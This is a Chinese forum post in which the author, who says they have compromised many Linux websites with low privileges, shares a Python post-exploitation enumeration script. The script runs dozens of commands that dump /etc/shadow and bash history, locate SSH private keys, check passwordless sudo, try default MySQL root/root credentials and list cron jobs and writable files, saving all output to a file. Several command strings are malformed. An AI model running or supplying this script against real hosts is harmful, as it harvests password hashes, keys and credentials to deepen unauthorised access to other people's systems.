发布于2022年10月14日3年前 接上一篇的,搞下了大部分的Linux的站。可是权限低的一批,这emmm。。。 很无奈,今天早上去给亲戚过生日,晚上Github搜项目,看到一个不错的Linux收集思路。就有了这篇文章。(本子图一张) 正文: 思路: 0.首先要获取系统信息: 系统名称 本地ip 主机名 本地dns 环境变量 shell程序 hosts文件 路由信息 arp缓存 计划任务 挂载磁盘 mail目录 history文件 home/root/bin/sbin目录 1.获取用户信息 当前权限 用户信息 本地用户 在线用户 hash加密规则 hash信息 用户组信息 最后登录信息 最后登录用户信息 所有用户的计划任务 2.安全扫描 是否能无密码sudo conf配置文件 ssh的密钥文件 是否能root登录 敏感配置文件扫描 关键字含有config、web.xml、database、pass的文件 uid为0用户 敏感服务匿名 空密码用户 zip/tar.gz/sh/pl/py/rb/txt/bak后缀文件 3.全部命令放入一个列表里,说明放入一个列表里 4.遍历写入 代码: import os ml=['uname -a','cat /etc/issue','hostname','cat /etc/hosts','who',"awk -F ':' '{print $1,$3,$4,$6;}' /etc/passwd",'cat /etc/group','cat /etc/shadow','grep -v -E "^#" /etc/passwd','cat ~/.bash_history','w','netstat','ps -aux','dpkg -l','netstat -antpu','arp -a','uname -a 2>/dev/null','hostname','lastlog','for i in $(cat /etc/passwd 2>/dev/null',"grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null",'grep -v "^#" /etc/passwd','cat /etc/shadow 2>/dev/null','cat /etc/master.passwd 2>/dev/null','echo ''sudo -S -l 2>/dev/null','ls -ahl /root/ 2>/dev/null','ls -ahl /home/ 2>/dev/null','find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null','find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls','''grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}''','echo $PATH 2>/dev/null','cat /etc/shells 2>/dev/null','cat /etc/login.defs 2>/dev/null | grep "PASS_MAX_DAYS\|PASS_MIN_DAYS\|PASS_WARN_AGE\|ENCRYPT_METHOD" 2>/dev/null | grep -v "#" 2>/dev/null','ls -la /etc/cron* 2>/dev/null','cat /etc/crontab 2>/dev/null','cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null','cat /etc/resolv.conf 2>/dev/null"','route 2>/dev/null','netstat -antp 2>/dev/null','netstat -anup 2>/dev/null','ps aux 2>/dev/null',"ps aux","'ls -la /etc/init.d 2>/dev/null'","find /etc/init.d/ \! -uid 0 -type f 2>/dev/null","mysql --version 2>/dev/null","sudo -V 2>/dev/null","mysqladmin -uroot -proot version 2>/dev/null","psql -V 2>/dev/null","apache2 -v 2>/dev/null; httpd -v 2>/dev/null","""awk '{sub(/.*\export /,"")}1""",'ifconfig'] shuomin=['内核(是否为x64还是x86)','版本','主机名','hosts','目前登录系统的用户信息','获取用户名','获取用户组','获取hash','列出超级用户','查看用户操作','获取在线用户','端口','进程','程序','敏感文件','交互通信的ip','arp缓存','基础内核信息','主机名','最后用户登录的信息','列出所有用户的组','查询是否有hash存储在/etc/passwd(*nix中)','根据uid列出本地用户','读取shadow文件','bsd的shadow文件','能够sudo不需要提供密码','检查root目录是否存在','显示home目录情况','寻找文件我们能写但是不属于我们的文件','寻找ssh公钥','root是否能登录ssh,如果返回yes则可以登录','环境变量','列出能用的shells','hash的密码加密政策','所有的计划任务配置文件','获取计划任务内容','获取每个用户的计划任务','dns设置','路由配置','正在监听的tcp端口','udp端口','正在运行的程序','查看进程路径和权限','获取inetd.conf文件(监视网络的守护进程)','列举各种服务的管理脚本','寻找不是root的','获取mysql版本','获取sudo版本','测试root/root能否登录','postgres版本','apache详情','apache的运行用户','ip'] def poc(): xk = open('save.txt', 'w') xk.close() for i in range(0,len(ml)): zx=os.popen(ml[i]) print('[+]{}'.format(shuomin[i])) print('[+]{}'.format(shuomin[i]),file=open('save.txt','a')) for z in zx: print(z,file=open('save.txt','a')) poc() 收集结果如下:
创建帐户或登录后发表意见